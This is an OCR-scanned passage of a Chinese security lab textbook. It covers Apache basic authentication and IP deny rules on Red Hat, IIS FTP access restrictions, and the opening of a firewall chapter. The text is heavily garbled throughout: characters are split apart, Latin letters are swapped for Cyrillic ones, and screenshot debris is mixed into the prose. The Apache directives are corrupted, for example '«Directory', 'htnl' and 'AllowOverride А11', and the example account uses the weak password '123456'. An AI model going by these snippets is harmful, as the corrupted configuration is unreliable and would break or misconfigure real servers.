|-@ Default Web Site Active Directory 客户 读 证 书 身份 .， 已 禁用 HTTP 401 质询 


@ Myweb 


图 7.22 启用 基本 身份 验证 


СЗ) 访问 该 网 站 ,出 现 如 图 7. 23 所 示 登 录 对 话 框 , 用 户 输入 正确 的 用 户 名 /口令 , 则 
可 访问 该 网 站 。 


Ne/ 信息 系统 安全 实验 教程 


连接 到 192. 168. 88. 1 


图 7.23 身份 认证 对 话 框 


7.4 Linux Apache Web 服务 器 安全 配置 实验 


7.4.1 实验 目的 
Linux Apache Web 服务 器 的 安全 配置 。 
7.4.2 实验 内 容 及 环境 


1. 实验 内 容 

配置 安全 Apache Web 服务 器 ,主要 包括 配置 网 站 的 身份 认证 机 制 和 基于 黑白 名 单 
实现 访问 控制 。 

在 一 个 网 站 中 多 数 页 面 是 对 浏览 者 公开 的 ,但 有 些 页 面 只 对 内 部 员工 或 者 会 员 才 提 
供 服 务 ,这 时 Apache 的 身份 认证 机 制 就 显得 尤为 重要 了 ,本 次 实验 为 Web 服务 器 配置 
合法 用 户 登 录 名 和 口令 信息 ,使 得 只 有 合法 用 户 才能 访问 Web 服务 器 。 

通过 配置 白 名 单 可 以 仅 授予 某 些 特定 TP 地 址 的 计算 机 访问 网 站 的 权限 ,或 通过 配置 
黑 名 单 拒绝 某 些 TP 地 址 的 计算 机 访问 网 站 。 

2. 实验 环境 

由 于 Ubuntu 主要 用 于 桌面 操作 系统 ,而 用 于 服务 器 的 操作 系统 主要 是 Red Hat、 
CentOS Linux 等 操作 系统 ,因而 本 次 实验 环境 为 主流 配置 计算 机 一 台 , 安 装 Red Hat 


Enterprise 5。 
7.4.8 实验 步骤 


(1) 以 root 用 户 身份 登录 系统 ,如 图 7. 24 所 示 。 

(2) 在 桌面 上 右 击 ,弹出 如 图 7. 25 所 示 的 快捷 菜单 ,选择 Open Terminal, 打 开 终端 。 

(3) 在 图 7. 26 所 示 命 令 行 终端 中 ,运行 命令 检查 Web 服务 器 是 否 已 安装 ,系统 默认 
已 安装 并 启动 Apache Web 服务 器 。 

(4) 进入 /var/www/html 目录 ,该 目录 是 Apache 默认 的 网 页 路 径 ,在 该 目录 中 新 建 
index. html 文件 ,如 图 7. 27 所 示 。 


第 7 章 “”Web 服务 器 和 РТР 服务 器 安全 配置 e^. 


RED HAT 


ENTERPRISE LINUXse 


Username: 


root 
Please enter your username 


Incorrect username or password. Letters must be 
typed in the correct case 


Ө Language gf Session АЯ Restart 2 Shut Down 


图 7.24 登录 窗口 


ff Applications Places System ”8:19PM Ф 


Create Folder 
Create Launcher... 
Create Document 


Clean Up by Name 
E Keep Aligned 


D Paste 


Change Desktop Background 


图 7.25 选择 Open Terminal 
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网 Applications Places System k :21PM Ф 


rootGbogon:— 


Б [rootébogon -]£ rpm -qa | grep httpd 
httpd-2.2.3-31.e15 
[rootébogon -]4 lj 


图 7.26 运行 命令 检查 是 否 已 安装 Apache 
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rootGbogon:/vai htm! 


Ble Еак Уем Terminal Tabs Help -— 

[rootébogon -]£ cd /var/www/html/ 

[root@bogon html]# 

[root@bogon html]# 15 

[root@bogon html]# touch index.html 
И) [root@bogon html]# 

[rootébogon html]# 15 

index.html 

[rootébogon html]& 


7.27 进入 Apache 网 页 主 目录 
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C5) 按照 图 7. 28 所 示 编 辑 index. html 文件 内 容 ,编辑 完成 后 保存 退出 。 


fb Applications Places System 


- 8:27PM Ф 


rootGbogon:/var/www/htm! 


Dis; Ed Vew, pina prs Hep. 
g <htmt> 
<head> 
«title»Create an ACL</title> 
</head> 
Ж <body> I 
This is a secret page 


ШЕКЕ ИЕШЕ 


图 7.28 编辑 网 页 内 容 


(6) 进入 /etc/httpd/conf/ 目 录 下 ,该 目录 是 Apache 的 配置 文件 所 在 目录 ,如 图 7. 29 
所 示 。 
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rootGbogon:/etc/httpd/conf 


Віе Edit View Terminal Tabs Help 
[rootébogon html]£ vi index.html 
[rootébogon html]4 
[rootébogon html]# cd /etc/httpd/conf 
[rootébogon conf]& 15 

Md httpd.conf magic 
[rootebogon conf]# lj 


图 7.29 进入 Apache 配 置 目 录 下 
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(7) 编辑 Apache 配置 文件 Һира. conf, 将 图 7. 30 中 第 291 至 第 294 行 ( 利 用 命令 set 
пи: 显示 行 号 ) 修 改 成 如 下 设置 : 
< Directory /var/www/htnl» 


AllowOverride А11 
</Directory> 
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rootGbogon:/etc/httpd/conf 


Bie. Eck, View; Termine Tape неш 

Е 289 # features. 
290 # 
291 «Directory /> 
292 # Options FollowSymLinks 
293 AllowOverride alil 
294 «/Directory» 
295 
296 # 
297 # Note that from this point forward you must specifically allow 
298 # particular features to be enabled - so if something's not working as 
299 # you might expect, make sure that you have specifically enabled it 
300 # below. 
301 # 
302 
303 # 
304 # This should be changed to whatever you set DocumentRoot to. 
305 # 
306 «Directory "/var/www/htmi*» 
307 
зөв # 
309 # Possible values for the Options directive are "None", "All", 
310 # or any combination of: 


图 7.30 修改 配置 文件 


(8) 配置 文件 修改 后 使 用 命令 httpd restart 重新 启动 Apache 服务 器 ,如 图 7. 31 
所 示 。 
(9) 打开 firefox, 输 入 192. 168. 100. 50( 网 站 所 在 计算 机 的 ІР 地址 为 192. 168. 100. 50), 
可 以 看 到 刚才 创建 的 页 面 ,如 图 7. 32 所 示 。 
(10) 打开 配置 文件 /etc/http/conf/httpd. conf ,并 在 第 548 行 处 输入 以 下 内 容 , 创 建 
存 取 控制 列表 文件 /etc/httpd/httppasswd, 创 建 完 成 后 保存 退出 ,如 图 7. 33 所 示 。 
< Directory "/var/www/html"» 
AuthUserFile /etc/httpd/httppasswd 
AuthName "this is private directory" 
AuthType Basic 
require valid- user 
</Directory> 


QD 创建 文件 后 ,需要 重新 启动 服务 ,如 图 7. 34 所 示 。 
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rootGbogon:/etc/httpd/conf 


Ble Edit View Terminal Tabs Help 
[rootébogon conf]# /etc/rc. 
rc.d/ rc.local — rc.sysinit 
[rootébogon conf]# /etc/rc.d/init.d/httpd restart 
Stopping httpd: t 
Starting httpd: httpd: apr sockaddr info get() failed for bogon 
httpd: Could not reliably determine the server's fully qualified domain name, u 
ing 127.0.0.1 for ServerName 
гок ] 
[root@bogon conf]& 


图 7.31 重新 启动 Apache 


Фф) Applications Places System 


Mozilla Firefox 


ate an A 


Бе Еак View History Bookmarks Tools Help 


CE 人 


B Most Visited Red Hat 网 Red Hat Magazine 网 Red Hat Network MilRed Hat Support. 


This is a secret page k 


图 7.32 网 页 访问 成 功 
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539 Alias /icons/ "/var/www/icons/" 

540 

541 alias /var/www/html "/var/www/html" 

542 «Directory "/var/www/icons"» 

543 Options Indexes MultiViews 

544 AllowOverride None 

545 Order allow,deny 

546 Allow from ali 

547 </Directory> 

548 «Directory "/var/www/html"» 

549 AuthType Basic 

550 AuthName "this is private directory" 
AuthUserFile /etc/httpd/httppasswd 
Require valid-user 
</Directory> 


# WebDAV module configuration section. 
# 
«IfModule mod dav fs.c» 
# Location of the WebDAV lock database. 
DAVLockDB /var/lib/dav/lockdb 
«/IfModule» 


图 7.33 创建 存 取 控制 列表 文件 
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rootGbogon:/var/www/htm! 
Ble Edit view Terminal Tabs Help 

[rootéredhat html]# service httpd restart 

Stopping httpd 

Starting http 

[rootéredhat htmi]4 8 


Р 7.34 重启 Apache 服务 
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(12) 利用 htpasswd 为 Apache 创建 账户 webuser, 并 将 其 信息 保存 在 文件 /etc/ 
httpd/httppasswd 中 ,如 图 7. 35 所 示 。 
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rootGbogon:/etc/httpd 


[rootéredhat httpd]# htpasswd -c /etc/httpd/httppasswd webuser 
fg New password: 
Re-type new password: 
Adding password for user webuser 
[rootéredhat httpd]# 
[rootéredhat httpd]# 
加 [root&redhat httpd]# 
[rootéredhat httpd]4 
[rootéredhat httpd]# 
[rootéredhat httpd]# 
[root@redhat httpd]& 
[rootéredhat httpd]& 
[rootéredhat httpd]4 
[rootéredhat httpd]4 
[rootéredhat httpd]4 
[rootéredhat httpd]4 
[rootéredhat httpd]£ 
[rootéredhat httpd]4 
[rootéredhat httpd]# 
[rootéredhat httpd]4 
[rootéredhat httpd]$ 
[rootéredhat httpd]4 
[rootéredhat httpd]4 
[rootéredhat httpd]# 


Р 7.35 X Apache 创建 账户 


(13) 重新 启动 Apache 服务 ,如 图 7. 36 所 示 。 

(14) 使 用 Firefox 浏览 /var/www/html/index. html, 将 提示 输入 密码 ,输入 用 户 名 
webuser、 密 码 123456 即 可 进入 ,和 否则 无 权限 进入 ,如 图 7. 37 所 示 。 

(15) Apache 使 用 三 个 指令 配置 访问 控制 : Order 用 于 指定 执行 允许 访问 规则 和 执行 
拒绝 访问 规则 的 先后 顺序 ,Deny 定义 拒绝 访问 列表 ,Allow 定义 允许 访问 列表 。 利 用 这 些 指 
令 可 以 设置 网 站 访问 的 黑白 名 单 , 这 里 通过 设置 黑 名 单 拒 绝 IP 地 址 为 192. 168. 100. 12 的 
计算 机 访问 该 网 站 。 打 开 配 置 文件 /etc/http/conf/httpd. conf ,在 第 332 行 处 输入 以 下 内 
JE ,修改 完成 后 保存 退出 ,如 图 7. 38 所 示 。 在 IP 地 址 为 192. 168. 100. 12 的 计算 机 上 访 
In] IP 地 址 为 192. 168. 100. 50 的 网 站 将 被 拒绝 。 


< Directory "/var/www/html"» 
Order allow, deny 
Allow from all 
Deny from 192. 168. 100. 12 
</Directory> 
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fü Applications Places System ® 


rootGbogon:/etc/httpd 


Бе Edi View Terminal Tabs Help 
[rootéredhat httpd]4 
8 [rootéredhat httpd]& 
[rootéredhat httpd]& 
[rootéredhat httpd]& 
[rootéredhat httpd]# 
[rootéredhat httpd]& 
T [rooteredhat httpd]# 
[rootéredhat httpd]# 
[rootéredhat httpd]# vi /etc/httpd/conf/httpd.conf 
[rootéredhat httpd]# 
[rootéredhat httpd]# service httpd restart 


[rootéredhat 
[rootéredhat 
[rootéredhat 
[rootéredhat 
[root&redhat 
[rootéredhat 
[rootéredhat 
[rootéredhat 
[root@redhat 
[rootéredhat 
[rootéredhat 


图 7.36 重启 Apache 服务 


A Applications Places System ® ЧҮ 9330 Ф 
e Red Hat Enterprise Linux Version 5.4 - Mozilla Firefox BOE 
Бе Edit View History Bookmarks Tools Help ^ 
-O05vwwwnaexnm p|) Cr ај 
1 Most Меат 网 Red Hat 网 Red Hat Magazine M Red Hat Network NilRed Hat Support 
日 
Authentication Required 
ffs) A username and password are being requested by http://192.168.100.50. The site says: 
"this is private directory" 
User Name: | webuser 1 
Password: | ++... 
www redhat com | 
| 
Get the latest news about the world's Open Source Leader. | 
Red Hat Network Global Support Services | 
Manage your system effectively through Red Hat. Need help with Red Hat Enterprise Linux? The Global. i] 
Waiting for 192.168.100.50... 


图 7.37 网 页 访问 身份 认证 
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rootGcloudlab:/etc/httpd/conf 


文件 介 SURE) EEV SRO FEO HMHW 


# It can be "А11", "None", or any combination of the keywords: 
Options FileInfo AuthConfig Limit 


:) 


AllowOverride None 


332 Order allow,deny 
Allow from all 
deny from 192.168.1.12 


336 </Directory> 

UserDir: The name of the directory that is appended onto a user's home 
directory if a "user request is received. 

The path to the end user account 'public htmi' directory must be 


accessible to the webserver userid. This usually means that "userid 
must have permissions of 711, "userid/public html must have permission| 


мо чеш н чч ч а 


of 755, and documents contained therein must be world-readable. 


图 7.38 修改 配置 文件 以 拒绝 某 台 计算 机 访问 网 站 


7.5 Window IIS FTP 服务 器 安全 配置 实验 


7.5.1 实验 目的 
掌握 Windows F IIS FTP 服务 器 的 安全 配置 方法 。 


7.5.2 实验 内 容 及 环境 


1. 实验 内 容 

由 于 IIS 6.0 和 IIS 7.0 的 安装 配置 方法 有 较 大 不 同 ,本 教材 为 了 兼顾 两 个 版 本 的 用 
P! ,分 别 介绍 Windows Server 2003 115 6. 0 和 Windows 7 IIS 7. 0 的 FTP 安全 配置 方法 。 
安全 配置 主要 涉及 身份 认证 和 访问 控制 设置 。 

2. 实验 环境 

实验 拓扑 如 图 7. 39 所 示 ,实验 需要 主流 配置 计算 机 两 台 , 一 台 作 为 FTP 客户 端 ,其 
作用 是 验证 FTP 服务 器 的 安全 配置 ,安装 Windows 7,IP 地 址 为 192. 168. 88. 211; 另外 
一 台 作 为 FTP 服务 器 ,设置 IP 地 址 为 192. 168. 88. 1 ,依次 安装 Windows Server 2003, 
Windows 7 操作 系统 ,分 别 进行 IIS 6.0 和 IIS 7. 0 的 安全 配置 实验 。 


-过 


FTP 客 户 端 FTP 服 务 器 
IP : 192.168.88.211 ІР: 192.168.88.1 


图 7.39 实验 拓扑 
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7.5.3 实验 步骤 


1. HS 6.0 FTP 服务 器 安全 配置 

1) IIS 6.0 FTP 服务 器 的 安装 

按照 7. 3. 3 节 的 步骤 安装 TIS 服务 器 ,在 如 图 7. 40 所 示 的 “应 用 程序 服务 器 ”对 话 框 
“Internet 信息 服务 ”, 单 击 “ 详 细 信 息 ” 选 项 ,在 出 现 的 如 图 7. 41 所 示 的 对 话 框 中 
勾 选 “文件 传输 协议 (FTP) 服 务 ”, 进 行 Windows 自 带 FTP 服务 器 的 安装 。 


7.41 添加 文件 传输 协议 (FTP) 组 件 


2) 设置 FTP 服务 器 不 允许 匿名 访问 

CD 打开 IIS 管理 器 , 右 击 界面 左 栏 的 FTP 站 点 ,在 弹出 的 快捷 菜单 中 选择 “新 建 ”一 
“FTP 服务 器 ”选项 ,按照 向 导 提 示 创 建 FTP, 设 置 主 路 径 *c:\ftp” ,设置 FTP 站 点 的 权限 
为 “ 读 取 和 写 人 ”。 安 装 完成 后 ,鼠标 右 击 刚 创 建 的 站 点 ,在 弹出 的 快捷 菜单 中 选择 “属性 ” 
选项 ,在 出 现 的 如 图 7. 42 所 示 的 对 话 框 中 选择 “安全 账户 ”选项 卡 ,可 看 到 FTP 默认 允许 
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匿名 连接 ,这 存在 一 定 的 安全 隐患 ,去 除 “允许 匿名 连接 ”, 如 图 7. 42 所 示 。 


7.42 不 允许 匿名 登录 


(2) 登录 ftp://192.168. 88. 1/ ,弹出 身份 认证 对 话 框 ,输入 用 户 名 才能 进入 ,如 图 7.43 
所 示 。 


7.43 FTP 身份 认证 


3) 设置 用 户 对 FTP 服务 器 的 不 同 访问 权限 

在 刚刚 新 建 的 FTP 服务 器 设置 中 允许 test 用 户 下 载 ,但 不 能 上 传 ,允许 用 户 zhang 
既 可 下 载 也 可 上 传 。 

CD 在 服务 器 所 在 操作 系统 中 创建 test zhang 用 户 , 分 别 设置 密码 。 选 中 FTP 的 主 
路 径 “c:\ftp”, 鼠 标 右 击 该 文件 夹 , 在 弹出 的 快捷 菜单 中 选择 * 属 性” 选项, 选择“ 安全” 选 
项 卡 ,在 “组 和 用 户 名 称 ”列表 中 罗列 了 当前 系统 中 的 部 分 用 户 名 ,如 图 7. 44 所 示 。 如 果 
用 户 test 和 zhang 没有 出 现在 其 中 , 则 单 击 “ 添 加 ”按钮 ,出 现 如 图 7. 45 所 示 的 对 话 框 。 
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dAdninistrators (ABB-4E6401E38AL 
BR CREATOR OWNER 

srst 

Efi Users (ABB-4E6401E38A1 \Users) 


图 7.45 “选择 用 户 或 组 "对话 框 


(2) 在 如 图 7.45 所 示 的 “选择 用 户 或 组 ”对 话 框 中 单 击 “ 高 级 "按钮, 出现 如 图 7. 46 
所 示 的 界面 。 

G) 在 图 7. 46 所 示 的 界面 中 单 击 “ 立 即 查 找 ” 按 钮 ,将 会 搜索 当前 系统 中 的 所 有 用 
P ,选择 刚刚 创建 的 用 户 zhang 和 test 后 单 击 “ 确 定 ” 按 钮 ,出 现 如 图 7. 47 所 示 的 界面 。 

(4) 在 如 图 7. 47 所 示 界 面 中 分 别 为 用 户 test 和 zhang 设置 对 该 文件 夹 的 访问 权限 ， 
使 得 test 可 读 , 但 不 可 写 ; 而 zhang 既 可 读 也 可 写 。 设 置 完成 后 ,分 别 以 test 和 zhang 用 
户 的 身份 登录 FTP 站 点 ,验证 是 否 可 以 进行 下 载 和 上 传 操作 。 

4) 设置 FTP 服务 器 只 允许 某 个 网 段 的 用 户 访问 

右 击 刚刚 创建 的 站 点 ,在 弹出 的 快捷 菜单 中 选择 “属性 ”选项 ,出 现 如 图 7. 48 所 示 的 
对 话 框 ,选择 “目录 安全 性 ”选项 卡 ,可 以 配置 网 站 访问 的 黑白 名 单 ,本 例 设 置 只 允许 IP 地 
址 为 192. 168. 88. 121 的 计算 机 访问 服务 器 ,设置 完成 后 验证 IP 地 址 为 192. 168. 88. 121 
的 计算 机 是 否 能 访问 FTP 站 点 以 及 其 他 IP 地 址 的 计算 机 是 否 不 能 访问 该 FTP 站 点 。 
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选择 用 户 或 给 


€ zhang (ABB-4E6401E38A1\zhang) 


7.47. 设置 对 FTP 路 径 的 访问 权限 
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图 7.48 限制 用 户 登录 FTP 


2. IIS 7.0 FTP 服务 器 安全 配置 


1) 创建 FTP 站 点 
(1) f£ Windows 7 中 ,打开 “Internet 信息 服务 (IIS) 管 理 器 ”, 在 左 侧 展 开 HIS 服务 


器 , 右 击 “网 站 ”选项 ,弹出 如 图 7. 49 所 示 的 快捷 菜单 ,选择 “添加 FTP 站 点 ”选项 。 


全 SAs-PC 主页 
29 - Ша) -HASERA | 分 组 依据 :区域 - 
жо бз Q Щ@ ъъ e X 


PIpv4 地 ҒТР 551 12 FTPA ҒТР 目录 浏 ҒТР 请 求 第 FPES ТР 80088 
Е 支持 览 选 证 


её = к ® ё а гы 


HTTP 响应 标 HTTP 重 定 向 == MIME 类 型 oce = 错误 页 
EJ 


= ш 4 à P Я 


BREE 身份 验证 жыя шшш на 
管理 
HSK ”共享 的 配置 MESSE 


图 7.49 选择 “添加 FTP 站 点 ”选项 
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(2) 根据 “添加 FTP 站 点 ”向 导 提 示 ,设置 FTP 站 点 名 称 、 站 点 物理 路 径 、IP 地 址 、 
端口 .身份 认证 方式 (选择 匿名 )\ 访 问 控制 (允许 所 有 用 户 读 取 和 写 和 人 ) 等 信息 ,如 图 7. 50、 


图 7.51 所 示 。 


1Р 地 址 (A): 


192.168.88.1 


[Г] 启用 虚拟 主机 名 (E): 


自动 启动 FTP 站 点 (S) 


SSL 
© 无 


© tř 
© FE SSL(R) 
551 证 书 (C): 


虚拟 主机 (示例 : ftp.contoso.com)(V): 


#00): 


mj 查看 (W) | 


me jT ]| se |[ юй 


— 


(3 


图 7.50 设置 FTP 站 点 /参数 
在 刚 创 建 的 FTP 服务 器 物理 路 径 中 添加 一 个 test. txt 文件 。 在 IP 地 址 为 


192. 168. 88. 211 的 计算 机 上 打开 浏览 器 ,输入 ftp://192. 168. 88. 11/ ,可 以 查看 并 下 载 


test. txt 文档 。 
2) 设置 黑 名 单 


CD 打开 IIS 管理 器 ,如 图 7. 52 所 示 , 单 击 左 侧 刚 创建 的 FTP 站 点 ,在 右 侧 双击 


“FTP IPv4 地 址 和 域 限 制 ? 图 标 。 


(2) 出 现 如 图 7. 53 所 示 的 界面 , 右 击 右 侧 空白 区 域 ,出 现 快捷 菜单 ,其 中 “添加 允许 
条 目 ”“ 添 加 拒绝 条 目 * 可 以 用 于 设置 访问 FTP 站 点 的 黑白 名 单 ,这 里 我 们 演示 黑 名 单 的 
设置 , 单 击 “ 添 加 拒绝 条 目 ” 选 项 ,出 现 如 图 7. 54 所 示 的 “添加 拒绝 限制 规则 ”对 话 框 。 

G) 在 如 图 7. 54 所 示 界 面 中 可 以 设置 规则 限制 某 个 IP 或 某 个 IP 地 址 范围 的 计算 
机 访问 FTP 站 点 ,这 里 设置 限制 IP 为 192. 168. 88. 211 的 计算 机 访问 FTP 站 点 。 

(4) 在 IP 地 址 为 192. 168. 88. 211 的 计算 机 上 访问 刚 创建 的 FTP 站 点 ,测试 是 否 可 


以 访问 。 
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图 7.51 设置 FTP 站 点 身份 认证 方式 


Ө › $А5ФС ， 网 站 » myfp › 


@ "via 


me + eec) -GASERA | Өнө Км 85 


"X Q & € 8 X & & » с B 


w їй) 
ҒТР Ірма 地 FTP SSL 设 ҒТР 当前 会 ”FTP ЈА PARM FIPHERO PAS FP 
п = 


AGE PIA 。 FTP 消息 ТР 用户 阿 
тө ж & Ei и 高 

mm [ЖР FPE 

B 

eases 


图 7.52 设置 FTP IPv4 地 址 和 域 限 制 
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文件 (F) REV 


B | 


帮助 (H) 


@ FTP IPv4 地 址 和 域 限制 


4-[8] 网 站 
>-@ Default 
54 Myweb 
^4 mfp 


4 Si SAS-PC (sas-PClenovo) || oum жут ~ 


Гах” x 
Web Site 


图 7.53 添加 FTP IPv4 地 址 和 域 限制 条 目 


拒绝 访问 以 下 IP 地 址 或 域名 : 
© 符 定 IP ВАНО): 
192.168.88.211| I 


© IP 地 址 范围 (R): 


HEM): 


图 7.54 “添加 拒绝 限制 规则 ”对 话 框 


3) 访问 必须 要 身份 验证 

在 创建 FTP 站 点 的 时 候 设置 用 户 登 录 方式 为 匿名 登录 ,所 有 用 户 都 可 以 登录 该 
FTP 站 点 ,如 果 限 制 只 有 合法 用 户 才 可 登录 ,可 以 启用 “基本 身份 验证 ”, 注 意 在 启用 “ 基 
本 身份 验证 "时 需要 禁用 “匿名 身份 验证 ”, 因 为 “匿名 身份 验证 ”的 优先 级 要 高 于 “基本 身 
份 验证 ”, 如 图 7.55 所 示 。 
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Ф › SAS-PC ， 网 站 › myftp » 


文件 (F) REV жан) 


БИИ 
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@ 应用 程序 池 

4-[8] 网 站 

b -@ Default Web Site 

b-@ Myweb 

-@ туйр 


图 7.55 启用 基本 身份 验证 


7.6 练 习 题 


(1) 在 Windows 下 另 选 一 款 流行 的 Web 服务 器 和 FTP 服务 器 进行 安全 配置 ,比较 


不 同 产品 安全 机 制 的 差异 。 


(2) 参考 Windows 下 IIS FTP 服务 器 的 安全 配置 ,完成 Linux 下 VSFTP 的 安全 


配置 。 
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8.1 概 Ж 


在 网 络 安全 领域 中 ,防火 墙 指 的 是 位 于 两 个 (或 多 个 ) 网 络 ( 比 如 企业 内 部 网 络 和 外 部 
互联 网 ) 之 间 的 、 实 施 网 间 访 问 控制 的 一 组 安全 组 件 的 集合 。 防 火 墙 在 内 、 外 两 个 网 络 之 
间 建 立 了 一 个 安全 控制 点 ,并 根据 具体 的 安全 需求 和 策略 ,对 流 经 其 上 的 数据 通过 允许 、 
拒绝 或 重新 定向 等 方式 控制 对 内 部 网 络 的 访问 ,达到 保护 内 部 网 络 免 受 非法 访问 和 破坏 
的 目的 。 

防火 墙 的 防护 作用 发 挥 必须 满足 下 列 条 件 : 一 是 由 于 防火 墙 只 能 对 流 经 它 的 数据 进 
行 控制 ,因此 内 、 外 网 之 间 的 所 有 网 络 数 据 流 必须 经 过 防火 墙 ; 二 是 防火 墙 是 按照 管理 员 
设置 的 安全 策略 与 规则 对 数据 进行 访问 控制 ,因此 管理 员 必 须根 据 安全 需求 合理 设计 安 
全 策略 和 规则 ,以 充分 发 挥 防火 墙 的 功能 ; 三 是 由 于 防火 墙 在 网 络 拓扑 结构 位 置 的 特殊 
性 及 在 安全 防护 中 的 重要 性 ,防火 墙 自 身 必 须 能 够 抵挡 各 种 形式 的 攻击 。 

防火 墙 在 执行 网 络 访问 控制 规则 时 ,会 有 两 种 不 同 的 安全 策略 : 一 是 定义 禁止 的 网 
络 流量 或 行为 ,允许 其 他 一 切 未 定义 的 网 络 流量 或 行为 , 即 默认 允许 策略 ; 二 是 定义 允许 
的 网 络 流量 或 行为 ,禁止 其 他 一 切 未 定义 的 网 络 流量 或 行为 , 即 默认 禁止 策略 。 从 安全 角 
度 考虑 ,第 一 种 策略 便于 维护 网 络 的 可 用 性 ,第 二 种 策略 便于 维护 网 络 的 安全 性 ,因而 在 
实际 中 ,特别 是 在 面 对 复 杂 的 Internet 时 ,安全 性 应 该 受到 更 重视 的 情况 下 ,第 二 种 策略 
使 用 得 更 多 ,这 也 符合 * 最 小 化 原则 ”。 

防火 墙 可 以 在 网 络 协议 栈 的 各 个 层次 上 进行 网 络 流量 的 检查 和 控制 。 根 据 作 用 的 
网 络 协议 层次 ,防火 墙 技术 可 以 自 上 而 下 分 为 包 过 滤 .电路 级 代理 技术 和 应 用 级 代理 
技术 ,不同 层次 的 技术 会 结合 在 一 起 同时 使 用 。 防 火 墙 技术 通常 能 够 为 网 络 管理 员 提 
供 以 下 安全 功能 : 一 是 过 滤 进 .出 网 络 的 网 络 流量 ; 二 是 禁止 脆弱 或 不 安全 的 协议 和 
服务 ; 三 是 防止 外 部 对 内 部 网 络 信息 的 获取 ; 四 是 管理 进 、 出 网 络 的 访问 行为 。 下 一 
代 防 火 墙 在 此 基础 上 ,增加 了 以 下 安全 功能 : 一 是 对 应 用 的 识别 和 控制 ; 二 是 对 规则 
库 的 智能 管理 。 

就 当前 的 防火 墙 技术 来 看 ,防火 墙 并 不 能 有 效应 对 以 下 安全 威胁 : 一 是 来 自 网 络 内 
部 的 安全 威胁 ; 二 是 通过 非法 外 联 的 攻击 ; 三 是 计算 机 病毒 ; 四 是 开放 服务 的 漏洞 ; 五 
是 针对 网 络 客 户 端 程序 的 攻击 ; 六 是 使 用 隐蔽 信道 进行 传播 的 特洛伊 木马 ; 七 是 网 络 钓 
鱼 和 其 他 由 于 配置 错误 等 人 为 因素 而 导致 的 安全 问题 。 通 过 引入 网 络 数 据 深度 检测 技 
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术 , 下 一 代 防 火 墙 将 能 有 效应 对 上 述 三 、 四 、 五 .六 等 类 型 的 安全 威胁 。 


8.2 常用 防火 墙 技 术 及 分 类 


8.2.1 防火 墙 技术 


1. 包 过 滤 

包 过 滤 是 最 为 广泛 的 一 种 防火 墙 技术 ,工作 在 网 络 层 和 传输 层 , 通 过 对 网 络 层 和 传输 
层 包 头 信息 的 检查 ,确定 是 否 转发 该 数据 包 , 从 而 可 将 许多 危险 的 数据 包 阻 挡 在 网 络 的 边 
界 处 。 检 查 的 依据 是 用 户 根据 网 络 安全 策略 定义 的 规则 集 , 对 于 规则 集 不 允许 通过 的 数 
据 包 ,直接 丢弃 ,只 有 规则 集 允 许 的 数据 包 , 才 进行 转发 。 规 则 集 通常 对 下 列 网 络 层 及 传 
输 层 的 包头 信息 进行 检查 : 源 和 目的 IP 地址 、IP 的 上 层 协议 类 型 (TCP/UDP/ICMP)、 
ТСР fil UDP 的 源 及 目的 端口 ICMP 报 文 类 型 和 代码 等 。 根 据 规则 集 定 义 方式 的 不 同 ， 
包 过 滤 技 术 分 静态 包 过 滤 和 动态 包 过 滤 两 种 技术 。 

静态 包 过 滤 技 术 检 查 单个 IP 数据 中 的 网 络 层 信息 和 传输 层 信息 ,合理 配置 能 够 提供 
相当 程度 的 安全 能 力 。 制 定 合 理 的 规则 集 是 静态 包 过 滤 防 火 墙 的 难点 所 在 ,通常 网 络 安 
全 管理 员 通 过 下 面 三 个 步骤 来 定义 过 滤 规 则 : 一 是 制定 安全 策略 ,通过 需求 分 析 , 定 义 哪 
些 流量 和 行为 是 允许 的 ,哪些 流量 和 行为 是 应 该 禁止 的 ; 二 是 定义 规则 ,以 逻辑 表达 式 的 
形式 定义 允许 的 数据 包 ,表达 式 中 明确 指明 包 的 类 型 .地 址 .端口 ,标志 等 信息 ; 三 是 用 防 
火 墙 支持 的 语法 重 写 表 达 式 。 静 态 包 过 滤 速 度 快 ,但 是 配置 困难 ,防范 能 力 有 限 。 

动态 包 过 滤 技 术 也 称 为 基于 状态 检测 的 包 过 滤 技术 ,不 仅 检查 每 个 独立 的 数据 包 , 还 
会 试图 跟踪 数据 包 的 上 下 文 关系 。 为 了 跟踪 包 的 状态 ,动态 包 过 滤 防 火 墙 在 静态 包 过 滤 
防火 墙 的 基础 上 记录 网 络 连接 状态 信息 以 帮助 识别 ,如 已 有 的 网 络 连接 .数据 的 传 出 请 求 
等 。 应 用 动态 包 过 滤 技 术 可 截断 所 有 传人 的 通信 ,而 允许 所 有 传 出 的 通信 ,这 是 静态 包 过 
滤 技 术 无 法 做 到 的 功能 。 动 态 包 过 滤 提 供 了 比 静 态 包 过 滤 更 好 的 安全 性 能 ,同时 仍然 保 
留 了 对 用 户 透 明 的 特性 。 

2. 应 用 代理 

应 用 代理 工作 在 应 用 层 ,能够 对 应 用 层 协 议 的 数据 内 容 进行 更 细致 的 安全 检查 ,从 而 
为 网 络 提供 更 好 的 安全 特性 。 使 用 应 用 代理 技术 可 以 让 外 部 服务 用 户 在 受 控 的 前 提 下 使 
用 内 部 网 络 服 务 。 比 如 ,一 个 邮件 应 用 代理 技术 可 以 理解 SMTP( 邮 件 传输 协议 ) 与 
POP3( 邮 局 协议 ) 的 命令 ,并 能 够 对 邮件 中 的 附件 进行 检查 ,对 于 不 同 的 应 用 服务 需要 配 
置 不 同 的 代理 服务 程序 。 通 常 可 以 使 用 应 用 代理 的 服务 有 HTTP、HTTPS/SSL、SMTP、 
POP3,IMAP,NNTP,TELNET,FTP #1 IRC 等 。 

相 比 包 过 滤 技 术 , 应 用 代理 技术 可 以 更 好 地 隐藏 内 部 网 络 的 信息 ,具有 强大 的 日 志 审 
核 功能 ,但 对 于 每 种 不 同 的 应 用 层 服务 需要 不 同 的 应 用 代理 程序 ,处 理 速 度 慢 , 无 法 支持 
私有 协议 的 服务 。 在 实际 应 用 中 ,应 用 代理 更 多 地 还 是 与 包 过 滤 技 术 结合 起 来 协同 工作 。 

3. NAT 代理 

NAT 是 Network Address Translation( 网 络 地 址 转换 ) 的 缩写 ,用 于 多 个 用 户 共 享 单 
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一 的 IP 地 址 ,同时 为 网 络 连接 带 来 一 定 的 安全 性 。NAT 工作 在 网 络 层 ,所 有 内 部 网 络 发 
往外 部 网 络 的 IP 数据 包 , 在 NAT 代理 处 完成 IP 包 的 源 地 址 部 分 和 源 端 口 向 代理 服务 
器 的 IP 地 址 和 指定 端口 的 映射 ,以 代理 服务 器 的 身份 送 往外 部 网 络 的 服务 器 ; 外 部 网 络 
